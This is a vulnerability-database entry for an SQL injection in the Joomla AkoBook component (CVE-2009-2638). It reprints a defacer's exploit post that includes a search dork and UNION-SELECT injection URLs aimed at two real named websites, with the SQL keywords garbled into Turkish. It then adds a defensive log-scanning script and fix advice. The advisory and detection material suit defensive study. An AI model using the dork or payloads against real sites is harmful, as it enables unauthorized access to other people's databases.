Konze AkoBook SQL Injection Vulnerability

Vulnerability ID 1117935 Vulnerability type SQL injection
Published 2009-06-09 Updated 2009-07-29
CVE number CVE-2009-2638 CNNVD ID CNNVD-200907-399
Platform PHP CVSS score 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/8911
https://cxsecurity.com/issue/WLB-2009070210
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200907-399
|Vulnerability details
The Joomla! AkoBook component (com_akobook) 2.3 contains an SQL injection vulnerability that allows remote attackers to execute arbitrary SQL commands via the gbid parameter in a reply action to index.php.
|Vulnerability EXP
Joomla Component com_akobook Vulnerability
----------------------------------------------------------------------
 ###################################################
 [+] Author        :  Ab1i
 [+] Email         :  ab1i_usta@hotmail.com
 [+] Dork  : inurl:index.php?option=com_akobook
 ###################################################
________________________________________________________
Example:
http://localHost/path/components/index.php?option=com_akobook&Itemid=36= ( SQL code )

Demo Live (1):
http://lesnyak.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birliği%20+%20+1,2,3,4,5,6,7,8,9%20seçin%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20*
Demo Live (2):
http://www.prostatitunet.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birliği%20+%20+1,2,3,4,5,6,7,8,9%20seçin%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20*
++++++++++++++++++++++++++++++++++++++++++++++++++
www.ayyildiz.org
A Turk has no friend but a Turk. You too, support Turkish sites ....
Turkish Defacers Ab1i
Eno7 , The_Bekir , Bgh7 , m0sted , Beygazi . Greetings to the masters :)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

<name>AkoBook</name>
<creationDate>09.04.2006</creationDate>
<author>Melikyan Sergey aka SaD</author>
<copyright> This component is released under the GNU/GPL License.  </copyright>
<authorEmail>contact@saddo.ru</authorEmail>
<authorUrl>http://saddo.ru/</authorUrl>
<version>SE 2.3</version>

# milw0rm.com [2009-06-09]
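The flaw above is reached through a GET request whose gbid parameter (a guestbook entry id) is concatenated into a query, so a defender can spot exploitation attempts in web-server access logs: a legitimate gbid is a bare integer, anything else is suspect. The following detection script is an added example written for this page, not part of the advisory or of the AkoBook component; the log lines, IP addresses and hostnames in it are constructed, and the Apache "combined" log format is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache "combined" access-log lines for illustration; the IPs,
# timestamps and paths are made up and are not taken from the advisory above.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Jun/2009:10:01:02 +0000] "GET /index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=17 HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
203.0.113.9 - - [09/Jun/2009:10:01:15 +0000] "GET /index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20union%20select%201,2,3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [09/Jun/2009:10:02:40 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.9 - - [09/Jun/2009:10:03:01 +0000] "GET /index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=12%27 HTTP/1.1" 500 210 "-" "curl/7.19"
"""

# Fields of the combined format that matter here: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SQL_KEYWORDS = re.compile(r"\b(union|select|from|where|sleep|benchmark)\b", re.IGNORECASE)


def classify_gbid(value):
    """Return None for a well-formed guestbook id, otherwise a short reason string."""
    if value.isdigit():
        return None
    if SQL_KEYWORDS.search(value):
        return "sql keywords in gbid"
    return "non-integer gbid"


def gbid_findings(log_text):
    """Scan access-log text and return one tuple per suspicious com_akobook request:
    (client_ip, timestamp, http_status, reason, decoded_gbid)."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs percent-decodes values, so the injected text is inspected in clear.
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        if "com_akobook" not in params.get("option", []):
            continue
        for value in params.get("gbid", []):
            reason = classify_gbid(value)
            if reason is not None:
                findings.append((m["ip"], m["ts"], int(m["status"]), reason, value))
    return findings


if __name__ == "__main__":
    for finding in gbid_findings(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule is the server-side fix: cast gbid to an integer (or bind it as a query parameter) before it reaches the database, and treat any request that fails that check as an attack indicator rather than a user error.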
|References

Source: BID
Name: 35268
Link: http://www.securityfocus.com/bid/35268
Source: MILW0RM
Name: 8911
Link: http://www.milw0rm.com/exploits/8911